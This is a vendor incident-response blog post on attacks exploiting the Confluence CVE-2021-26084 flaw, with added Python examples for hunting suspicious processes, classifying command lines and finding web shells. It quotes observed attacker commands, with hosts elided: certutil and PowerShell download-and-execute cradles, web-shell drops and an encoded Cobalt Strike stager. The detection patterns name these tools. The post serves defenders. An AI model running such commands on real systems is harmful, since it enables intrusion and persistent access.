Blue Team: A Defensive Perspective on the Confluence Vulnerability (CVE-2021-26084)
Over the past week and during the Labor Day holiday weekend, the BlackBerry Incident Response (IR) team has seen an increase in confirmed exploitation of the recently disclosed Confluence Server and Data Center vulnerability, assigned CVE-2021-26084. This continues a recent trend of critical vulnerabilities affecting external facing systems.
This vulnerability allows attackers to perform pre-authenticated remote code execution (RCE), which means an attacker can run code on the target system without first authenticating to Confluence. With multiple proof-of-concept (POC) exploits floating around on the Internet, threat actors are scanning the web and dropping payloads as quickly as possible before network defenders have an opportunity to mitigate.
This article will highlight several attacker techniques we are seeing across multiple environments, such as abuse of Certutil and PowerShell to discover information about an infected system and network, and to deploy additional persistence mechanisms.
Most Common Attacker Techniques
While this vulnerability also affects Linux® installations, the incidents that we have seen thus far have been running on Windows®. In these cases, BlackBerry observed the command prompt spawned as a child process of the tomcat9.exe process. By hunting on this parent/child relationship, many related events were identified:
> cmd.exe /c
BlackBerry researchers initially found generic system discovery commands being used to enumerate information about the system and network for the impacted host:
cmd.exe /c "net user /domain"
cmd.exe /c "net time /domain"
cmd.exe /c "net group \"domain admins\" /domain"
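The parent/child hunt described above, as an added example that is not part of the BlackBerry post or its products: it walks a handful of constructed Sysmon-style process-creation events (hostnames, PIDs and paths are made up), keeps only cmd.exe processes whose parent image is tomcat9.exe, and labels those whose command line is one of the domain discovery commands listed above. The same cmd.exe running under explorer.exe is deliberately not flagged, since the parent relationship is what makes the event interesting.

```python
"""Hunt for cmd.exe spawned by Confluence's Tomcat service and flag the
domain discovery commands the post lists, over constructed Sysmon-style
process-creation events (added example; not BlackBerry's own tooling)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


# Matches "net user /domain", "net time /domain" and
# 'net group "domain admins" /domain' (net1.exe and .exe suffix tolerated).
DISCOVERY_RE = re.compile(
    r"\bnet1?(?:\.exe)?\s+(user|group|time)\b[^&|]*?/domain\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events, parent_name="tomcat9.exe"):
    """Return one finding per cmd.exe whose parent image is parent_name.
    'discovery' is the net sub-command seen, or None for other commands."""
    by_pid = {(e.host, e.pid): e for e in events}
    findings = []
    for e in events:
        if basename(e.image) != "cmd.exe":
            continue
        parent = by_pid.get((e.host, e.ppid))
        if parent is None or basename(parent.image) != parent_name:
            continue
        m = DISCOVERY_RE.search(e.cmdline)
        findings.append({"host": e.host, "pid": e.pid, "cmdline": e.cmdline,
                         "discovery": m.group(1).lower() if m else None})
    return findings


# Constructed sample telemetry: hostnames, PIDs and paths are made up.
TOMCAT = r"C:\Program Files\Atlassian\Confluence\bin\tomcat9.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent("conf01", 1804, 652, TOMCAT, '"' + TOMCAT + '"'),
    ProcEvent("conf01", 4120, 1804, CMD, 'cmd.exe /c "net user /domain"'),
    ProcEvent("conf01", 4133, 1804, CMD,
              'cmd.exe /c "net group \\"domain admins\\" /domain"'),
    ProcEvent("conf01", 4150, 1804, CMD, 'cmd.exe /c dir'),
    # Same discovery command, but from an interactive admin shell.
    ProcEvent("conf01", 2000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("conf01", 2210, 2000, CMD, 'cmd.exe /c "net user /domain"'),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']} pid={f['pid']} discovery={f['discovery']}: {f['cmdline']}")
```

On a real estate the events would come from Sysmon Event ID 1 or an EDR process tree; the point is that any cmd.exe under tomcat9.exe deserves a look, and the discovery label only prioritises the review.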
Certutil is a legitimate utility used by Windows Certificate Services for the configuration and management of certificates. This tool is also commonly abused by threat actors to perform a variety of malicious activities. Threat actors often select legitimate Windows utilities because they are already present on a victim’s system and are unlikely to be flagged as suspicious – this attacker technique is called “living off the land” (LotL).
In the case of these Confluence exploitation events, certutil was abused to download web shells and executable files. Below is an example of how certutil was used to download a malicious binary file:
cmd.exe /c "certutil.exe -urlcache -split -f hxxp:///aaaa[.]exe
BlackBerry also discovered cases of PowerShell being used to download and execute code, scripts, and executable files. Examples of these commands are included below.
powershell -c "Invoke-WebRequest -uri http://:/hhhh -OutFile iiii[.]exe;./iiii[.]exe"
cmd.exe /c "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://:/jjjj'))\""
cmd.exe /c "PoWershElL.exE -eXEc bypASS -noP -WInD HIdDEN -C IeX (NeW-OBjeCt Net.WeBClIeNt).DowNlOAdStRinG(http://:/kkkk.json;)"
cmd.exe /c "powershell -w hidden -c (new-object system.net.webclient).downloadfile(http://:/llll.jpg;llll.bat;);start-process llll.bat"
Threat actors install backdoors to compromised hosts to prevent the need for re-exploitation. This is done to ensure that they maintain access even after patching occurs.
Because Apache Tomcat can run Java Server Page (JSP) files to execute server-side code on the web server itself, threat actors are abusing this software to install web shells on vulnerable Confluence servers. This allows them to create persistent access to the impacted systems. Examples of how certutil is abused to download web shell files include the following:
cmd /c \"cd /d \"\\Program Files\\Atlassian\\Confluence\\confluence\\\"&certutil.exe -urlcache -split -f http:///bbbb[.]jsp images\\themes\\cccc[.]jsp"
cmd.exe /c \"certutil.exe -urlcache -split -f http:///dddd[.]jsp confluence/eeee[.]jsp\"
cmd.exe /c \"certutil.exe -urlcache -split -f http:///ffff[.]jsp ./confluence/gggg[.]jsp\"
In some cases, the threat actor deployed Cobalt Strike stagers to the infected systems to create persistence in memory and stage for additional lateral movement. A partial example of the Cobalt Strike deployment is included below.
cmd.exe /c "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlA[redacted]"
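A command-line classifier for the certutil and PowerShell patterns shown in this section and the previous ones, added here as an example and not taken from BlackBerry's detection rules: it tags certutil -urlcache downloads, PowerShell download cradles (case-insensitively, so the mixed-case variant above is caught), hidden-window switches, and -encodedcommand blobs, which it decodes from base64/UTF-16LE so the payload can be inspected and run through the same cradle check. The samples are the observed command shapes from this post (hosts elided as in the post) plus two constructed lines: a fully encoded cradle and a benign certutil invocation. The decoder trims a truncated blob to a 4-character boundary, which is why the redacted example above still yields its readable prefix.

```python
"""Classify certutil and PowerShell download/execution command lines and
decode -encodedcommand payloads (added example; not BlackBerry's own rules)."""
import base64
import re

CERTUTIL_DL_RE = re.compile(
    r"\bcertutil(?:\.exe)?\b[^&|]*?-urlcache\b[^&|]*?-f\b", re.I)
POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
# Download/execute primitives; re.I handles the mixed-case obfuscation.
CRADLE_RE = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient|invoke-webrequest|\biwr\b"
    r"|\.downloadstring\b|\.downloadfile\b|\biex\b|invoke-expression", re.I)
HIDDEN_RE = re.compile(r"-w(?:ind(?:owstyle)?)?\s+hidden\b", re.I)
# -e, -ec, -enc, -encoded, -encodedcommand followed by a base64 blob.
ENCODED_RE = re.compile(
    r"-e(?:c|nc?|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(blob):
    """-encodedcommand carries base64 of UTF-16LE text. A redacted or
    truncated blob is cut back to a 4-char boundary so the prefix still decodes."""
    blob = blob[: len(blob) - len(blob) % 4]
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def classify(cmdline):
    """Return (sorted tags, decoded encoded command or None)."""
    tags = set()
    decoded = None
    if CERTUTIL_DL_RE.search(cmdline):
        tags.add("certutil_download")
    if POWERSHELL_RE.search(cmdline):
        if CRADLE_RE.search(cmdline):
            tags.add("powershell_download_cradle")
        if HIDDEN_RE.search(cmdline):
            tags.add("powershell_hidden_window")
        m = ENCODED_RE.search(cmdline)
        if m:
            tags.add("powershell_encoded_command")
            decoded = decode_encoded_command(m.group(1))
            if CRADLE_RE.search(decoded):   # cradle hidden inside the blob
                tags.add("powershell_download_cradle")
    return sorted(tags), decoded


def make_encoded(script):
    """Build a constructed -encodedcommand blob for the sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLES = [
    # Observed shapes from the post; hosts are elided as in the post.
    'cmd.exe /c "certutil.exe -urlcache -split -f hxxp:///aaaa[.]exe',
    'powershell -c "Invoke-WebRequest -uri http://:/hhhh -OutFile iiii[.]exe;./iiii[.]exe"',
    'cmd.exe /c "PoWershElL.exE -eXEc bypASS -noP -WInD HIdDEN -C IeX '
    '(NeW-OBjeCt Net.WeBClIeNt).DowNlOAdStRinG(http://:/kkkk.json;)"',
    'cmd.exe /c "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlA[redacted]"',
    # Constructed: a complete encoded command whose decoded body is a cradle.
    "powershell -nop -w hidden -enc " + make_encoded(
        "$s=New-Object Net.WebClient;IEX $s.DownloadString('http://example.invalid/x')"),
    # Constructed benign admin usage: no download, no cradle.
    'cmd.exe /c "certutil.exe -verify cert.cer"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        tags, decoded = classify(line)
        print(tags, (decoded or "")[:40], line[:60])
```

Tagging by primitive rather than by exact string is what keeps the mixed-case sample and the encoded sample in scope; the benign certutil line falls through with no tags, which is the false-positive case a practitioner will want to confirm before alerting on certutil at all.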
Actions to Take
First, check this list to see if you have an on-premise, affected version of Confluence Server or Data Center. If you are running an affected version, the next step is to upgrade to a fixed version if you’re able. If you are not able to upgrade, implement the temporary workaround supplied by Atlassian.
Finally, it’s critical to check for signs of compromise on the Confluence host and surrounding environment. We listed some of the attacker techniques above that should be detected if compromise has occurred. Check the entire file system for any signs of web shells. Note that attackers can use very small web shells such as China Chopper, which can time-match itself to surrounding files to blend in and avoid detection.
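One way to do the file-system check described above without relying on timestamps, as an added example that is not BlackBerry's or Atlassian's tooling: take a hash manifest of every .jsp file under the Confluence install from a known-good state (a clean install or a pre-incident backup) and compare the live tree against it. A planted file that has copied its neighbour's modification time, as the China Chopper note above describes, still shows up as new, and a legitimate page with an appended shell still shows up as modified. The demo builds a constructed install tree in a temporary directory, plants a marker-only file at the images/themes path seen earlier in this post, time-matches it to a neighbour, and appends to an existing page; the content heuristic only ranks the new or changed files, it is not the detection.

```python
"""Hunt for web shells under a Confluence install by comparing live .jsp
files against a hash manifest from a known-good state (added example; not
part of the BlackBerry post or Atlassian's tooling)."""
import hashlib
import os
import re
import tempfile

# Tokens typical of command-executing JSP shells; used only to rank hits.
SUSPECT_RE = re.compile(
    rb"Runtime\.getRuntime\(\)\.exec|ProcessBuilder|Class\.forName\(")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, exts=(".jsp", ".jspx")):
    """Map relative path -> sha256 for every JSP-like file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def find_webshell_candidates(root, baseline):
    """Return (relpath, reason, suspicious_tokens) for JSP files absent from
    the baseline or whose hash differs. Timestamps are never consulted."""
    findings = []
    for rel, digest in sorted(build_manifest(root).items()):
        if baseline.get(rel) == digest:
            continue
        reason = "new" if rel not in baseline else "modified"
        with open(os.path.join(root, rel), "rb") as f:
            tokens = sorted({m.decode() for m in SUSPECT_RE.findall(f.read())})
        findings.append((rel.replace(os.sep, "/"), reason, tokens))
    return findings


def demo():
    """Constructed install tree: baseline it, then plant a time-matched file
    under images/themes (the path seen in the post) and append to index.jsp."""
    root = tempfile.mkdtemp(prefix="confluence-demo-")
    themes = os.path.join(root, "confluence", "images", "themes")
    os.makedirs(themes)
    legit = os.path.join(themes, "theme.jsp")
    index = os.path.join(root, "confluence", "index.jsp")
    with open(legit, "wb") as f:
        f.write(b"<%-- constructed legitimate page --%>\n")
    with open(index, "wb") as f:
        f.write(b"<%-- constructed index --%>\n")
    baseline = build_manifest(root)            # taken while the tree is clean

    planted = os.path.join(themes, "cccc.jsp")  # file name pattern from the post
    with open(planted, "wb") as f:              # marker text only, not a shell
        f.write(b"<%-- constructed marker: Runtime.getRuntime().exec --%>\n")
    st = os.stat(legit)
    os.utime(planted, (st.st_atime, st.st_mtime))  # time-match to a neighbour
    with open(index, "ab") as f:
        f.write(b"<%-- constructed appended change --%>\n")
    return find_webshell_candidates(root, baseline)


if __name__ == "__main__":
    for rel, reason, tokens in demo():
        print(f"{reason:8} {rel} {tokens}")
```

In practice the baseline comes from the vendor package or a backup taken before the exposure window, and the comparison should cover the whole web root (including images and theme directories), since the observed drops above land outside the directories a reviewer would normally look at.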
BlackBerry Cyber Suite and BlackBerry Guard stop these attacks
If in doubt, call in the experts at BlackBerry to perform forensic analysis and conduct a compromise assessment. BlackBerry customers can feel confident that our AI-driven BlackBerry® Cyber Suite, as well as our Managed Detection & Response (MDR) solution BlackBerry® Guard, are well-equipped to mitigate the risks posed by these continued external-facing vulnerabilities. Core technology includes:
- BlackBerry® Protect provides automated malware prevention, application and script control, memory protection, and device policy enforcement.
- BlackBerry® Optics extends the threat prevention by using BlackBerry Optics Context Analysis Engine (CAE) rules to provide additional telemetry. The following rules were effective at identifying exploitation of the vulnerability:
- Certutil Abuse
- Powershell Download
- Powershell Encoded Command
- One-Liner ML Module
- Account Discovery
Victim of an Attack?
In the unfortunate event that it is too late for prevention and you believe you have already been the victim of an attack, please contact us, regardless of your existing BlackBerry relationship.
The BlackBerry Incident Response team is made up of world-class consultants dedicated to handling response and containment services for a wide range of incidents, including ransomware and Advanced Persistent Threat (APT) cases.
Read our latest blog on this vulnerability: Red Team: An Offensive Perspective on the Confluence Vulnerability (CVE-2021-26084)
About Tony Lee
Vice President of Global Services Technical Operations, BlackBerry.
Tony Lee, Vice President of BlackBerry Global Services Technical Operations, has more than fifteen years of professional research and consulting experience pursuing his passion in all areas of information security.
As an avid educator, Tony has instructed thousands of students at many venues worldwide, including government, universities, corporations, and conferences such as Black Hat. He takes every opportunity to share knowledge as a contributing author to Hacking Exposed 7, and is also a frequent blogger, researcher, and author of white papers on topics ranging from Citrix Security, the China Chopper Web shell, and Cisco's SYNFul Knock router implant.
Over the years, he has contributed many tools to the security community such as UnBup, Forensic Investigator Splunk app, and CyBot, the extensible Threat Intelligence Bot framework designed for anyone from a home user to a SOC analyst.
About Codi Starks
Senior Professional Services Incident Response Consultant at BlackBerry.
Codi Starks has more than twelve years of IT, cybersecurity, and incident response experience. During his time in the field he has supported and led difficult incident response engagements for Fortune 500 companies spanning multiple continents.
He currently holds several certifications and achievements, including an M.S. in Information Security and Assurance, as well as the OSCP and SANS GCFE certifications. He has won multiple cybersecurity competitions, including OpenSOC, SANS DFIR Netwars, and SOCX.